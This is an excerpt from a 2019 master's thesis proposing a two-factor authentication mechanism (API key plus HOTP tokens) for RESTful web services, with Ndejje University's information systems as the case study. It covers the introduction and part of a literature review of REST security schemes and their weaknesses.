Enhancing RESTful Web Service Security with a Multi-Factor Authentication Mechanism


Tesis de Máster, 2019

84 Páginas, Calificación: 15.0


Extracto


Table of Contents

List of Tables

List of Figures

List of Abbreviations

Abstract

CHAPTER ONE
GENERAL INTRODUCTION
1.1 Introduction
1.2 Background of the study
1.3 Statement of the Problem
1.4 Objectives of the study
1.3.1 Main objective
1.3.2 Specific objectives
1.5 Research Questions
1.6 Scope
1.7 Significance of the study
1.8 Justification of the study
1.9 Definition of Key terms
1.10 Conceptual framework

CHAPTER TWO
LITERATURE REVIEW
2.1 Introduction
2.2 Security Implementations in REST
2.3 Security Schemes for REST-based Web Services
2.2.1 HTTP Basic Authentication
2.2.2 HTTP Digest Authentication
2.2.3 API-Keys
2.2.4 OAuth (Token-based Authentication) and OpenID Connect
2.2.5 ID-based Authentication (IBA)
2.4 Vulnerabilities to RESTful Web Services
2.3.1 Cross-Site Scripting (XSS) attack
2.3.2 Injection Attacks
2.3.3 Cross-Site Request Forgery (CSRF)
2.3.4 Insecure Direct Object Reference
2.3.5 Parameter Tampering
2.5 SOAP Security Mechanisms
2.6 Vulnerabilities to SOAP
2.7 Comparison of REST-Security and SOAP-Security Mechanisms
2.8 API Management
2.7.1 Secure, Reliable and Flexible Communication
2.7.1.1 API Gateway
2.7.2 API Lifecycle Management
2.7.3 API Auditing, Logging and Analytics
2.9 Conclusion

CHAPTER THREE
RESEARCH METHODOLOGY
3.1 Introduction
3.2 Research design
3.3 Area of study
3.4 Sample and Sampling technique
3.5 Data collection methods and instruments
3.4.1 Interviews (Group discussions)
3.4.2 Document Review
3.6 Data Analysis
3.7 Design and implementation
3.6.1 Design
3.6.2 Development
3.8 Quality Control Methods
3.7.1 Development
3.7.2 Data Collection
3.9 Test and Validation
3.8.1 Test
3.8.2 Validation
3.10 Limitations of the study

CHAPTER FOUR
DESIGN, ANALYSIS AND DISCUSSION OF FINDINGS
4.1 Introduction
4.2 Demographic Information
4.3 System Usage and Efficiency
4.4 Document Analysis
4.3.1 WS-Security for REST services
4.3.2 Cipher Text Stealing
4.3.3 HOTP: HMAC-Based One-Time Password Algorithm
4.5 Existing Systems and Security mechanism
4.6 System and Security Requirements
4.7 Functional Requirements
4.6.1 Interoperability
4.6.2 Registrations and Adding of Users (Students, staff)
4.6.3 System logs and tracking
4.8 Non Functional Requirements
4.9 Implementation Specific Requirements
4.10 Design
4.9.1 Architectural Diagram
4.9.2 Sequence Diagram
4.9.3 Class diagram
4.9.4 State Diagram
4.11 Implementation
4.10.1 Implementation of HMAC-HOTP in REST
4.10.2 Hashed One Time Password
4.10.3 HOTP Validator
4.10.4 Token Sharing in REST
4.12 Testing
4.13 Validation of the Multi-Factor Authentication

CHAPTER FIVE:
SUMMARY, CONCLUSION AND RECOMMENDATIONS
5.1 Introduction
5.2 Summary of Findings
5.3 Conclusion
5.4 Recommendations
5.5 Suggestions for Further Research

References

Appendices

Dedication

I dedicate this project to God Almighty my creator, my strong pillar, my source of inspiration, wisdom, knowledge and understanding. He has been the source of my strength throughout this program and on His wings only have I soared. I also dedicate this work to my parents, Mr. and Mrs. Matovu, who have always believed in my abilities to succeed in all my endeavors; My wife, Lydia Kiirya who has encouraged me all the way and whose encouragement has made sure that I give it all it takes to finish that which I have started; My child Josephine Naluyima Alouise who has been affected in every way possible by this quest; My good friend, John Bosco Mawebe for your selfless support towards anyone who sought your God-given intellect during our studies.

Thank you. My love for you all can never be quantified. God bless you all.

Acknowledgement

First and foremost, I would like to thank God the Almighty for giving me the strength, knowledge, ability and opportunity to undertake this research study and to persevere and complete it satisfactorily. Without his blessings, this achievement would not have been possible.

Special thanks and gratitude to:

Mr. Kasozi Brian, my supervisor, for providing his invaluable guidance, comments and suggestions throughout the course of the project. His special interest and knowledge in Web services enabled him to give me the right guidance and also, provided me with much needed motivation.

Mr. Yiga Stephen for starting me off on this research process and constantly motivating me to work harder.

RUFORUM (Regional Universities Forum for Capacity Building in Agriculture) in conjunction with Ndejje University for partially sponsoring this master's course.

My Parents and betrothed, Lydia for always being supportive of my education.

My friends especially Mr. Mawebe John Bosco and Mrs. Prossy Mbabazi . John Bosco for always being there for me especially in times when I was too weak physically and mentally to attend to my academic obligations. Prossy for spearheading our group discussions and being my chauffeur after those grueling Friday classes. May the God Almighty bless you.

List of Tables

Table 1: ISR for REST SECURITY

Table 2: Penetration Testing Report

List of Figures

Figure 1: Research Conceptual Framework

Figure 2: SOAP Web Service Security Stack (Gorski, et al., 2014)

Figure 3: Proposed RESTful Web Service Security Stack (Gorski, Iacono, Nguyen and Torkian, 2014)

Figure 4: API Management Capabilities (De, 2017)

Figure 5: API Management Platform Services (De, 2017)

Figure 6: API Gateway Capabilities (De, 2017)

Figure 7: Demography based on Gender of Respondents

Figure 8: Client -Server Architecture- Digest Authentication

Figure 9: Types of Requirements (Perforce, 2014)

Figure 10:RESTful Web Service Architecture

Figure 11: Sequence Diagram for Two- Factor Authentication Using HOTP in REST

Figure 12: Token Generator Sequence Diagram

Figure 13: Class Diagram for Token Generation

Figure 14: State Diagram for Multi-Factor Authentication Mechanism

Figure 15: HOTP Flow Chart

Figure 16:HOTP VIEW

List of Abbreviations

Abbildung in dieser Leseprobe nicht enthalten

Abstract

To date, organizations such as Ndejje University are still running autonomous legacy systems alongside newer modern web-based systems. These organizations choose this way of operation as they fear that a direct system changeover can cause disruptions to an organization’s daily operations. Additionally, some organizations realize that they still need the business-critical functionalities embedded within millions of code in their legacy systems. However, keeping autonomous systems within an organization is counterproductive as these systems do not support interoperability. Therefore, a need arises for autonomous systems to share data and information, and this can be achieved through systems integration. RESTful web services provide a cost-effective and an efficient alternative to tight business process integration. With RESTful web services, legacy systems can be integrated with newer web-based or mobile user interfaces. However, RESTful web services currently do not provide secure integration as they have no specified security standards. Therefore, they are not recommended for use in enterprise-level systems which require strong security implementations. RESTful web services’ stateless nature, their reliance on HTTP and use of URIs to transfer sensitive data has led to security breaches. The security challenges are mostly experienced in REST’s authentication process. In this study, the researcher explored the different security mechanisms/schemes currently available in RESTful web services, and was able to determine their strengths and weaknesses. With Ndejje University’s two major autonomous information systems being taken as the basis for this study, a qualitative research was undertaken to determine how systems at Ndejje University are developed, implemented and operationalized. The qualitative approach carried out also explored the user experiences on the University’s information systems, with the aim of rallying support for the integration. From the data collected through interviews and document reviews, the researcher was able to define the requirements for an improved authentication mechanism, which was designed, implemented and tested. The two-factor authentication mechanism developed is based on the existing API key authentication mechanism and HOTP algorithm. This authentication mechanism requires the communicating services/applications to be granted access only after successfully presenting two or more pieces of evidence, that is, the API-key and an access token generated by the service server based on the HOTP algorithm. The developed security mechanism is able to identify and block unauthentic URIs and traffic received in RESTful web services. The two-factor authentication mechanism is an improvement on most of existing mechanisms which rely on a single factor to authenticate the client service/application to the server service/application, before responding to requests by sending the requested resource.

CHAPTER ONE

GENERAL INTRODUCTION

1.0 Introduction

This dissertation focused on Enhancing Restful Web Service Security with a Multi-Factor Authentication Mechanism. Ndejje University’s two major information systems, ARMS and ZeeVarsity, were taken as the case study for the secure integration using RESTful web service.

It was noted that evolving legacy enterprise systems into a lean system architecture has been on the agendas of many organizations in order to deliver timely digital solutions to users to gain a competitive advantage (Habibullah, Liu and Tan, 2018; Lu, Glatz and Peuser, 2019). Most legacy systems are based on monolithic architectures like the tiered architecture where everything is developed and deployed as a single artifact. This makes the initial development and deployment easy and simple. However, as the code-base grows in size, the development process becomes slower, difficulties are experienced in the continuous deployments, and there are limited scaling possibilities (Kalske, 2017).

The first generation of the Service-Oriented Architecture (SOA) was touted as a solution to the challenges experienced within monolithic applications. SOA unlike monolithic approaches, implemented objects from Object Oriented languages as services, hence the birth of the term web services (Dragoni, et al., 2017). A web service is a software module offered by a service provider through the Web (Tihomirovs and Grabis, 2016). However, SOA defined difficult and unclear requirements for services e.g. discoverability and service contracts, hence its adoption was hindered. Additionally, SOA’s slow adoption was attributed to its over-reliance on heavyweight middleware and its association with the web services SOAP protocol (Jamshidi, et al., 2018).

SOAP (Simple Object Access Protocol) was developed as an alternative to the previous technologies such as CORBA (Common Object Request Broker Architecture), RMI (Remote Method Invocation) and DCOM (Distributed Component Object Model) which were used in earlier distributed monolithic applications (Tihomirovs and Grabis, 2016; Mumbaikar and Padiya, 2013). To ensure data transport in SOAP, protocols such as SMTP (Simple Mail Transfer Protocol), FTP (File Transfer Protocol), HTTP (Hypertext Transfer Protocol) etc., are used, while the data is sent in XML (eXtensible Markup Language) format. The amount of data sent by SOAP can cause some performance problems because when forming the message,

SOAP adds an additional header and body parts to the message (Tihomirovs and Grabis, 2016). This makes SOAP a heavyweight communication technology known for producing network traffic and causing higher latency (Mumbaikar and Padiya, 2013).

Recent advances in legacy system evaluation is in favor of the micro-services Architecture (MSA), which not only significantly reduces the complexity involved in deploying enterprise systems, but also enhances the availability of services to system users (Habibullah, Liu and Tan, 2018). (Dragoni, et al., 2017) describe MSA as the second iteration on the concept of SOA. MSA comprises of small services, each running its own processes and communicating via light-weight mechanisms, typically Representational State Transfer (REST) and HTTP. Each micro-service is expected to implement a single business capability, in fact, a very limited system functionality, bringing benefits in terms of service scalability and simplicity (Bucchiarone, et al., 2018).

REST is considered to be a lighter alternative to the heavy SOAP protocol which consumes more bandwidth and resources (Tihomirovs and Grabis, 2016). However, REST-based Web Services provide no pre-defined security protection methods (Lee and Mehta, 2013). But (Adamczyk, et al., 2011) state that REST is only known to ensure basic message-level security using HTTPS. More complex capabilities such as signatures, encryption, or federation (enabling a third party to broker trust of identities) cannot be supplied by HTTP alone, yet REST heavily relies on HTTP.

1.1 Background of the study

In today's business environment, business processes are more likely to be dynamic, distributed, and collaborative, making it necessary for enterprises to adapt business processes more often, and integrate processes across organizational boundaries with their business partners (Lee and Mehta, 2013). Furthermore, organizations also need to expose business-critical functionalities, embedded within millions of code in their legacy systems and integrate these functionalities with new web-based or mobile user interfaces. The REST technology provides a cost-effective and an efficient alternative to support tight business process integration (Lee and Mehta, 2013). Moreover, majority of Internet of Things (IoT) and Web Service companies like Google and Amazon are currently developing their Web interfaces based on RESTful Web Services (Lee, Jo and Kim, 2017).

REST is an abstract architectural style for designing distributed services systems that scale over the large public Internet (Iacono, Nguyen and Gorski, 2019; De Backere, et al., 2014).

REST constrains an architecture to the client-server model which is a request-response communication flow. REST specifies constraints such as resource identification (addressability), uniform interface, stateless interactions, hypermedia as the engine of application state (HATEOAS), and self-descriptive messages (Nguyen, Tolsdorf and Iacono, 2017). With RESTful Web services’ statelessness, every request is only dependent on itself. One simply has to examine the request to gather all the details concerning it. Stateless also means that the service is more reliable, because there are less steps where something can go wrong. In distributed services, the lack of state means that there is no overhead to keep the different servers consistent (De Backere, et al., 2014).

The REST-based approach to Web services is easier to implement since its design heavily relies on HTTP, which is a stateless communication protocol (Lee and Mehta, 2013). REST uses Uniform Resource Identifiers (URIs) to identify resources. A resource is anything that can be named as a target of hypertext, for example, a file or a script (Adamczyk, et al., 2011). REST also uses the GET, PUT, POST and DELETE actions to retrieve, update, create, and delete the resources remotely through Web servers. HTTP status codes are used to send feedback to the client. All these actions are already provided for by HTTP, therefore, accelerating the adoption of REST in Web-based environments. Additionally, JSON (JavaScript Object Notation) or XML are used in REST to transport or exchange messages between services as well as between client and servers (Lee and Mehta, 2013).

When considering REST for the design of service systems of any kind, the general security demands of SOA apply, and since SOAP is the dominant technology for implementing SOA- based systems, its security stack can then serve as reference for REST (Iacono, Nguyen and Gorski, 2019). SOAP uses standardized Web Services Security (WS-Security) to ensure basic security services such as confidentiality and integrity of messages. WS-Security is based on XML encryption and XML signatures. The SOAP security stack also includes: WS-Trust for establishing and brokering trust relationships between service endpoints; WS-Federation which provides authorization management across organizational and trust boundaries; WS- Authorization which provides a description of the authorization management; WS-Privacy which covers privacy constraints; WS-Security Policy which specifies how constraints and requirements in terms of security are defined for SOAP messages; and WS-Secure Conversation which expands the security mechanisms for a conversation between two communication partners.

But even with the protection provided by WS-Security, SOAP-based Web services are still prone to the same attacks that can be launched on any standard Web application such as SQL injections, capture and replay attacks, buffer overflows, denial-of-service attacks and improper error handling (Lee and Mehta, 2013). Additionally, newly found attacks including XML external entity attacks, XML bombs, malicious SOAP attachment, and XPath injections are some of the other vulnerabilities of SOAP-based Web services.

Just like SOAP-based web services, RESTful Web services are prone to the same threats that all other Web services face. A recent comparison of the available state of the art REST security mechanisms have revealed that the available technologies are in homogeneous and contain many vulnerabilities or do not comply with the REST constraints (Iacono, Nguyen and Gorski, 2019). Therefore, RESTful Web services are in need of a better security stack than that offered by SOAP-based Web services. But at the moment, the available REST-based security stack is scarce in comparison to the SOAP-based security stack. Some standards related to the authorization of service invocations (such as OAuth) and drafts on identity federation are currently available. However, the fundamental message security layer (just like WS-Security in SOAP) is nonexistent, along with the higher order security concepts including trust, secure conversation and many others (Iacono, Nguyen and Gorski, 2019). In addition, (De Backere, et al., 2014) states that popular security mechanisms such as OAuth and OpenID violate the strict principles of REST since they are state-ful, meaning that they rely on sessions.

Additionally, many IoT and Web service companies are still confronting challenges in implementing the stateless concept of REST due to problematic authentication processes (Lee, Jo and Kim, 2017). The stateless concept of REST implies that the server does not save the client's status, and consequently, the server does not use the concept of sessions. Without the concept of sessions, an authentication problem arises in RESTful Web Services, as a client authentication process is necessary whenever servers receive client requests.

Newer methods such as the ID-based Authentication (IBA) proposed by (Lee, Jo and Kim, 2017) have implemented the stateless concept along with ensuring authenticity, integrity and confidentiality of HTTP messages. However, these implementations do not comply with all the REST constraints and are still vulnerable to attacks such as replay attacks due to their use of URIs in authentication processes. According to (De Backere, et al., 2014), the use of URIs to transfer important data may result in privacy breaches as data is not anonymized. Therefore, with REST increasingly adopted in critical enterprise web applications today, priority has to be established on ensuring appropriate security measures in RESTful Web services (Iacono, Nguyen and Gorski, 2019).

Current State of Ndejje University’s Information Systems

Ndejje University was the first private university in Uganda. Set up in 1992, the University has two campuses, in Luweero and Kampala. Ndejje University currently has two major autonomous information systems, that is, Academic Records Management System (ARMS) and ZeeVarsity. It is to be noted that no known security breach has ever been recorded for either system. Below, we describe how they currently operate.

i) ZeeVarsity

ZeeVarsity is a cloud-based ERP for Institutions of Higher Learning. ZeeVarsity is based on a Micro-services Architecture that consolidates all the processes of any institution of higher learning. This system is publicized as a solution that offers online services such as application and admission, tuition payment management, registration, results and transcripts processing, course information management and timetabling. ZeeVarsity can be accessed through multiple channels such as: web apps, mobile apps (both Android and IoS), USSD and many others. The system currently boasts of an enviable client list which includes some of the leading public and private universities in Uganda.

The most impressive functionality of ZeeVarsity is its Online Payment Management module, ZeePay, which offers real-time reconciliation with some of the leading banks in Uganda such as DFCU, Centenary, Barclays, Stanbic and Ecobank. Additionally, ZeePay’s robust API is engineered to integrate securely with mobile-commerce platforms such as Mobile Money.

However, at Ndejje University, most of the modules offered by ZeeVarsity remain under­utilized. Only the Zeepay module has gained notable use, though full module utilization is still a long way off. The modules that are intended to handle the academic processes remain unused by academic staff who prefer using ARMS, which was entirely tailored to the Ndejje University academic processes. It is to be noted that the academic modules in ZeeVarsity are yet to be customized to Ndejje University’s academic processes.

ii) ARMS (Academic Records Management System)

ARMS is a 4-tier Web-based system which supports all academic records management operations and functions at the University. The system’s server is housed in one of Uganda’s leading telecommunications company’s data center to ensure its 24/7 availability. ARMS is secured by HTTPS and a complex encryption scheme applied to its database. ARMS is currently being used in all seven faculties of the University to manage academic records for over 6000 students enrolled students and also, the University’s Alumni. Every student at the University has an account on the system where they can track their course information and academic progress. Students can printout their academic progress report (results slip).

Management staff make use of the Staff Engine which applies a customizable Role-based Access Control for authentication of users depending on their jurisdiction. Users for this module include Examinations Officers, Lecturers, Heads of Department, Faculty Deans, Academic Registrar and Deputy Vice Chancellor. Users can: view, import, edit, approve or publish results; analyze progressive assessment or weighted scores for individuals or student groups; manage exemptions and credit transfers; access academic progress reports for individuals or particular student groups among many. The system also supports the Academic Registrar Department in the processing of relevant academic documents for students such as academic testimonials and transcripts.

However, the other modules of ARMS such as the admission portal, online registration and finance module, which were developed later, remain unused. The development of these modules was over delayed that the University management became frustrated and decided to acquire the ZeeVarsity system, which was marketed as an integrated system for institutions of higher learning.

In addition, the University subscribes to Consortium of Uganda University Libraries which provides access to various e-library resources such as EBrary, Wiley Online Library, Ebscohost, Cambridge University Press and Springer e-books among many.

In order for a student to access the services offered by any of the diverse University information systems, an account has to be created for them by a member of staff, on each of those information systems. Then, the initial credentials to those accounts have to be shared with the student. These interactions are mainly accomplished through physical means. Therefore, a student has to maintain credentials to several information systems, which is quite difficult for any individual today.

Conclusion

In conclusion, there was a need for the University to integrate its information systems in order to promote interoperability between these formally autonomous legacy systems. The researcher proposed the development of a RESTful web service to enable the interoperation of these two 6 systems, due to its simplicity and scalability. However, REST is still faced with a number of security challenges not limited to cross-site scripting and parameter tampering. Therefore, there was a need of enhancing the current security mechanisms applied in RESTful web services in order to facilitate the secure integration of Ndejje University information systems. RESTful web services’ most obvious weakness lies in its use of plain text URIs in its authentication processes.

1.2 Statement of the Problem

Organizations have been running autonomous legacy systems but due to the development and change in technology, such organizations have been forced to embrace the current technological trends, for example micro-services, cloud computing and mobile computing. However, this requires integration of the different systems, some of which might be external to the organization. Companies have integrated their systems using RESTful web service style because of its scalability and less complexity as compared to SOAP (Gorski, Iacono and Nguyen, 2014). Organizations share very sensitive information within their systems and this information is critical for business survival and, maintaining competitive advantage. However, REST architectural style is still not secure as it is faced by a number of security threats which include but not limited to cross-site scripting, parameter tampering and replay attacks (Lee, Jo and Kim, 2017; Iacono, Nguyen and Gorski, 2019). These types of attacks target and attempt to exploit the authentication mechanism that a service uses to verify the identity of a service or application. This type of attack can lead to identity theft and leaking of confidential information which might lead to the organization losing its competitive advantage and money (Laudon and Laudon, 2007). The authentication process is a crucial component in securing a software application or system. Hence, securing authentication process itself, becomes an even important and imperative task. This is because the repercussions of successful penetration of an authentication system can be seriously harmful. Therefore, this study aimed at developing an enhanced multi-factor authentication mechanism in REST that can verify the authenticity of client applications and requests.

1.3 Objectives of the study

1.3.1 Main objective

The main objective of this study was to implement a multi-factor authentication mechanism in RESTful web services capable of identifying and blocking unauthentic Uniform Resource Identifiers and traffic received from client applications.

1.3.2 Specific objectives

1. To study and review existing literature related to RESTful web services and information security thus identifying loopholes and determining requirements for an improved authentication mechanism in RESTful web services.
2. To design an improved authentication mechanism in web services based on the requirements identified in the literature review and hence coming up with blueprints of an improved authentication mechanism for REST.
3. To implement the logical designs of the improved secure authentication mechanism of RESTful web services
4. To test and validate the developed authentication mechanism to ensure that it secures RESTful web services and improves their security.

1.4 Research Questions

1. How is security implemented in RESTful web services?
2. How does the service development style or standard affect the service security?
3. How can security be improved in RESTFul web services?

1.5 Scope

1.5.1 Functional Scope

The study took into consideration the different web service architectures but with main focus on RESTful web services. Further, the security and implementation of RESTful web service will be critically analyzed to identify loopholes and thus providing possible solution. The study followed the different technologies which include Hypertext preprocessor and Java technologies. Emphasis was put on AJAX since most applications consuming RESTful web services normally are running AJAX on the Client side. The study also reviewed how HTTP works mainly focusing on the three major HTTP functions (GET, POST, PUT) that are always deployed in RESTful web services.

1.5.2 Geographical Scope

The study was focused mainly on the different legacy systems at Ndejje University. The University has its Main Campuses at Ndejje, Luweero District, and another campus at Mengo, Kampala District. The study was carried out at Kampala Campus since most of the systems are housed and hosted there.

1.6 Significance of the study

Ndejje University students and staff will be able to access all University electronic services using one single sign-on endpoint offered by the developed RESTful Web service. The electronic services include both academic and financial services currently offered by two systems built on different architectures.

The researcher’s developed authentication mechanism can be implemented in REST-based Web service applications especially in enterprise systems to offer stronger security.

Additionally, this project can be used as a guide or as a reference by organizations with interest of securely integrating their various information systems that may include both modern and legacy systems. Many legacy systems still contain sensitive information and functionalities which are vital for business competitiveness. Migration of such information is typically difficult, tedious and prone to data loss. Some functionalities available in legacy systems are difficult to be implemented in modern systems. Therefore, integration of newly developed systems with existing legacy systems using REST may be the ideal solution for organizations that desire no disruptions in their daily operations when a new system is introduced.

1.7 Justification of the study

In order to maintain a competitive advantage over their competitors, organizations need to develop applications which are omnipresent with their consumers (Thomas and Gupta, 2016). Consumers demand for an application architecture that offers access through multiple channels such as: web apps, mobile apps, social media, notifications or email and many others (Thomas and Gupta, 2016). The MSA is the trending architecture for developing and integrating applications that can offer services to users via diverse endpoints. MSA is commonly implemented using REST and HTTP (Bucchiarone et al., 2018).

In addition, many organizations are still running various autonomous legacy systems that contain sensitive information and business-critical functionalities that are vital for business survival. Therefore, there is a need to integrate these systems with new Web-based or mobile­user interfaces. REST technology supports this business process integration (Lee and Mehta, 2013). Furthermore, RESTful HTTP forms the basis in emerging technologies such as the fifth generation of mobile communication systems (5G) and IoT (Iacono, Nguyen and Gorski, 2019).

However, REST is known to provide only basic message-level security using HTTPS with no support for more complex capabilities such as signatures, encryption or federation (Iacono, Nguyen and Gorski, 2019). Lee, Jo and Kim (2018) specifically pinpoint REST’s problematic authentication process as the major challenge being confronted by developers today.

Therefore, the need for better security mechanisms for RESTful web services aimed at improving the authentication process had become apparent. With most of the existing REST security mechanisms like the API key and HTTP Digest Authentication relying on a single factor to authenticate client requests, the researcher developed a two-factor authentication mechanism to improve the REST authentication process. The two-factor authentication mechanism requires the communicating services/applications to be granted access only after successfully presenting two pieces of evidence.

1.8 Definition of Key terms

Service is a reusable software functionality usable by various clients for different purposes enforcing control rules (Cerny, Donahoo and Pechanec, 2017).

A vulnerability is a flaw in the application that stems from coding defects, and causes severe damage to the application upon exploitation (Jimenez, Mammar and Cavalli, 2009)

Data validation is the process of ensuring that a program operates on clean, correct, and useful input data (Ao and Gelman, 2011).

A legacy system is any business critical software system based on outdated technologies that are resistant to modification, but remains in operation within an organization. Legacy systems' failure can have a significant impact on the business (Crotty and Horrocks, 2016).

1.9 Conceptual framework

The conceptual framework is the researcher’s understanding of how the particular variables in the study connect with each other (Regoniel 2015). The study focused on improving the security mechanisms of REST. A Number RESTful Service threats were reviewed and relationship between the threats and Security measures was determined. The research covered how URIs are generated and data passed from one entity to another. This will help determine the requirements for an improved Security mechanism in REST-based services.

Abbildung in dieser Leseprobe nicht enthalten

Figure 1: Research Conceptual Framework

Figure 1 shows the conceptual framework that guides the study. REST faces a number of security threats. However, this study focuses on the most common and harmful threat, cross­site scripting (XSS), which might even lead to identity theft, cross-site request forgery, injection attack, insecure direct object references, parameter tampering etc. All these factors affect the security of RESTful Web services. Therefore, the study also considers the different components that make up REST. These components are always affected by the identified threats. These components include the URI, authentication token, the data and the underlining protocol HTTP. It should be noted that not only the listed threats constitute to the insecurity of REST. Other factors such poor security policies, social engineering and spoofing can be as harmful too.

CHAPTER TWO

LITERATURE REVIEW

2.0 Introduction

This chapter reviews the literature that was relevant to this study. The literature was attained from many researchers that have published articles and journals that are related to the main and specific objectives of the study. In this chapter, the researcher focused on the current implementations of REST and SOAP, with emphasis on security mechanisms available in both. Additionally, vulnerabilities affecting the optimal performance of both approaches to Web services was also reviewed.

2.1 Security Implementations in REST

Security is not taken into account by default in the REST architectural style, but its layered architecture provides many opportunities for implementing it (De Backere, et al., 2014). Since REST is a very general concept, its specifics have to be considered carefully in order to obtain a suitable and seamless security for RESTful Web Services. The term general in this context has to be understood as generic in the sense that the schemes contained in the REST-security framework are not bound to a specific REST-based technology or protocol only, but are applicable to any RESTful technology (Iacono, Nguyen and Gorski, 2019).

The abstract layer of REST and its instantiations should first be taken in account when constructing REST-Security. Simply mapping the concrete WS-Security technologies to construct REST-Security is not feasible as both reside on different abstract layers. Since REST represents an abstract model, security components for this architectural style need to be considered and defined on the same abstraction layer as well. Consequently, REST-security needs to be a general framework composed of definitions, structures and rules on how to protect REST-based systems (Iacono, Nguyen and Gorski, 2019).

Unlike SOAP messages, REST messages are not self-contained. SOAP messages are composed of a header and a body, all encased in an envelope, making one enclosed XML document (Mumbaikar and Padiya, 2013). If the available security mechanisms are to be applied, both the message parts are covered. However, in the case of REST messages, especially RESTful HTTP, meta-data is included in the HTTP header and the resource representation (payload data) inside the HTTP body. Since the HTTP header and body in REST are disjointed, distinct security mechanisms need to be applied in a balanced manner to avoid novel vulnerabilities being exploited in future. Such was the case when JSON gained widespread preference over XML in REST service messages.

JSON had been drafted as an alternative to XML to fill the REST’s core security layer (Gorski, et al., 2014). This was due to REST's independence from particular data types, unlike SOAP exclusive reliance on XML. XML is a certain option for REST service messages as it can be used for protection means due to the availability of XML security. But XML's use in REST messages has drawbacks such as processing overheads due to verbosity of XML and more importantly, the missing support in Web browsers since browsers are a crucial platform for implementing service consumers. Instead, JSON was preferred due to its lightweight form and its support for Web browsers. According to (Gorski, et al., 2014), IETF and W3C established working groups in 2011 intending to specify standard JSON security mechanisms that could be used to fill the REST message security layer. But the developed standards offered insufficient protection, since they only provided security services for the payload decoupled from the metadata contained in the application layer transfer protocol, yet the metadata is equally important as the payload.

Most of the previous relevant works on REST Security have been conducted in relation to basic service message security with a focus on authentication and authorization. Consequently, when searching for the term REST Security, the appearing results point to implementation-oriented best practices or recommendations by frameworks, companies or other organizations. Some of the notable organizations that have implemented REST-Security mechanisms in their enterprise systems include Google, Hewlett Packard (HP) and Microsoft who utilize enhanced API-Keys to secure their keys in transit (Gorski, et al., 2014). The most commonly used message security mechanisms in REST are discussed in the following section.

2.2 Security Schemes for REST-based Web Services

Only few standardized security technologies do exist for REST-based web services (Nguyen, Tolsdorf and Iacono, 2017). The HTTP Basic and HTTP Digest Authentication are the first two security schemes which have been published for web applications. Other security schemes which include API-Keys, OAuth, OpenID and ID-based Authentication (IBA) have since been implemented. The schemes are briefly discussed below, with emphasis put on the way they operate and their weaknesses. The selection of the discussed security schemes is based on their availability as open standards.

2.2.1 HTTP Basic Authentication

This uses the ID and password of a client to authenticate the client’s request in the HTTP header. When a server requests an authentication for a client, the server sends a message “HTTP 401 Not Authorized” with WWW-authenticated HTTP header. The client’s ID and password are encoded with Base64 and stored in the HTTP authentication header. As they are neither encrypted nor hashed, they are usually sent via HTTPS or SSL. However, HTTP basic authentication does not support a logout function. Additionally, due to HTTP basic authentication’s need for saving ID and password, it has security vulnerabilities such as replay attack, injection attack, and middleware hijacking (Lee, Jo and Kim, 2017; Iacono, Nguyen and Gorski, 2019).

2.2.2 HTTP Digest Authentication

This is an advanced version of HTTP basic authentication because it encrypts the client’s ID and password via hash such as MD5 (Message Digest algorithm 5). By creating a nonce on the client side, HTTP basic authentication can protect the hash from a Rainbow Table attack. Also, the timestamp created on a server can secure the message of a client from a replay attack. However, HTTP digest authentication can be attacked via Man-in-the-Middle method since it does not provide a method to verify the server to a client.

Additionally, both HTTP basic and HTTP digest authentication methods need sessions to authenticate client messages. Servers have to store a session ID in order to run communication between the Resource Server and the clients. Without sessions, these authentication methods would have to authenticate every single request of a client each time, thereby wasting time and CPU and Network resources (Nguyen, Tolsdorf and Iacono, 2017; Iacono, Nguyen and Gorski, 2019).

2.2.3 API-Keys

Application programming interface (API) keys are randomly generated strings, which are negotiated out-of-band between client and server. An API-key is added to the URL or header of every request. According to an analysis of the web API directory ProgrammableWeb, API­keys are currently the most used authentication mechanism in REST-based web services (Iacono, Nguyen and Gorski, 2019). However, API-keys share the same drawbacks as HTTP basic authentication. Since the API-key is transferred to the server in plain-text, the credentials are only protected during transit if transport-oriented security means such as TLS are being used. This makes the API-key vulnerable at both client and server endpoints (Iacono, Nguyen and Gorski, 2019).

2.2.4 OAuth (Token-based Authentication) and OpenID Connect

OAuth is an authorization framework for granting access to end users’ resources for third party applications (Iacono, Nguyen and Gorski, 2019). The OAuth 2.0 specification (latest version of OAuth) describes a system that allows an application to access resources (typically personal information) protected by a resource server on behalf of the resource owner, through the consumption of an access token issued by an authorization server (Li, Mitchell and Chen, 2019). In support of this system, the OAuth 2.0 architecture involves the following four roles: i) The Resource Owner is typically an end user; ii) The Client is a server which makes requests on behalf of the resource owner (the Client is the relying party (RP) when OAuth 2.0 is used for single sign-on); iii) The Authorization Server generates access tokens for the client, after authenticating the resource owner and obtaining its authorization; iv) The Resource Server stores the protected resources and consumes access tokens provided by an authorization server (this entity and the Authorization Server jointly constitute the Identity Provider (IdP) when OAuth 2.0 is used for single sign-on).

OpenID Connect builds an identity layer on top of the OAuth 2.0 protocol (Li, Mitchell and Chen, 2019). The added functionality enables RPs to verify an end user identity by relying on an authentication process performed by an OpenID Provider (OP). In order to enable an RP to verify the identity of an end user, OpenID Connect adds a new type of token to OAuth 2.0, namely the id_token. This complements the access token and code, which are already part of OAuth 2.0. An id_token contains claims about the authentication of an end user by an OP, together with any other claims requested by the RP.

However, OAuth 2.0 and OpenID Connect have vulnerabilities such as: privacy leak issues (might occur when an RP deliberately sends user tokens to a third party); impersonation attacks; CSRF (Cross Site Request Forgery) attacks where an attacker controls a victim user's RP account without knowledge of their username or password; Authorization Flow Misuse where RPs submit a combination of code, access token and id token back to their Google sign­in endpoint which can lead to serious vulnerabilities; Unsafe Token Transfers where results from RPs not using HTTPS to protect the Google sign-in data transfers; Covert Redirect Vulnerability where an attacker can forge a login page in order to capture the user's credentials or the attacker can redirect the URI to get a client's ID and password (Lee, Jo and Kim, 2017; Li, Mitchell and Chen, 2019).

2.2.5 ID-based Authentication (IBA)

Generally, all current authentication methods for REST require additional steps, for example, redirection in OAuth, storage of a session key or storage of ID and password in HTTP authentication. Those requirements make it difficult to maintain statelessness of the RESTful Web service. The inability of these methods from maintaining statelessness of clients exposes client information to attackers.

